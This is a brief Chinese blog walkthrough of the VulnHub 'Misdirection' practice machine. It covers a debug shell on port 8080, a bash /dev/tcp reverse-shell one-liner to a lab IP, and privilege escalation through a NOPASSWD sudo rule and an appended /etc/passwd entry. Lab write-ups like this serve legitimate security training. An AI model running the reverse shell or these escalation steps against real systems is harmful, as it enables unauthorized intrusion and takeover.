Misdirection 打靶

前言
sudo 提权,追加passwd提权
信息收集
一样老三样,我就不写了,主要是发现了8080端口有个debug shell
端口渗透获得立足点
1 | bash -c "/bin/bash -i >& /dev/tcp/192.168.199.129/1234 0>&1" |
提权
这部分主要是sudoers提权 和 追加passwd记录新用户提权
先看sudo -l
的结果
1 | www-data@misdirection:/var/www/html/debug$ sudo -l |
(brexit) NOPASSWD: /bin/bash
说明用户可以在 brexit
账户权限下运行 /bin/bash
且不需要输入密码
1 | dkpg -l | grep python |
不得不说诡异的终端啊,还得是心中有vim自然成
- 标题: Misdirection 打靶
- 作者: OneZ3r0
- 创建于 : 2025-06-29 11:56:02
- 更新于 : 2025-07-29 18:03:58
- 链接: https://blog.onez3r0.top/2025/06/29/vulnhub-misdirection-walkthrough/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。